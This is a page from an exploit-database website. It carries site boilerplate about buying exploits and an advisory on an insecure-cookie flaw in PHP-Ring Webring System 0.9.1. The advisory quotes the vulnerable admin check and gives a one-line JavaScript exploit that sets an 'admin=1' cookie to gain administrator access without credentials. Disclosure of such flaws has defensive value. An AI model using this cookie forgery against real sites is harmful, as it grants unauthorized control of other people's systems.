0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability
==================================================================== PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability ==================================================================== ------- DESCRIPTION: PHP-Ring Webring System , suffers from insecure cookie handling, when a admin login is successfull the script creates a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are logged in as a legit admin. --- vuln code in /admin/wr_admin.php $cookie = $_COOKIE[admin]; //check for cookie if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") { include("../templates/wr_header.php"); echo "Enter admin username and password to log in"; .... .... .. } else { function adminhome() // load admin settings --- exploit: javascript:document.cookie = "admin=1; path=/"; ----- now visit /admin and you can get admin access and manage the cms ;) ------- # 0day.today [2024-12-25] #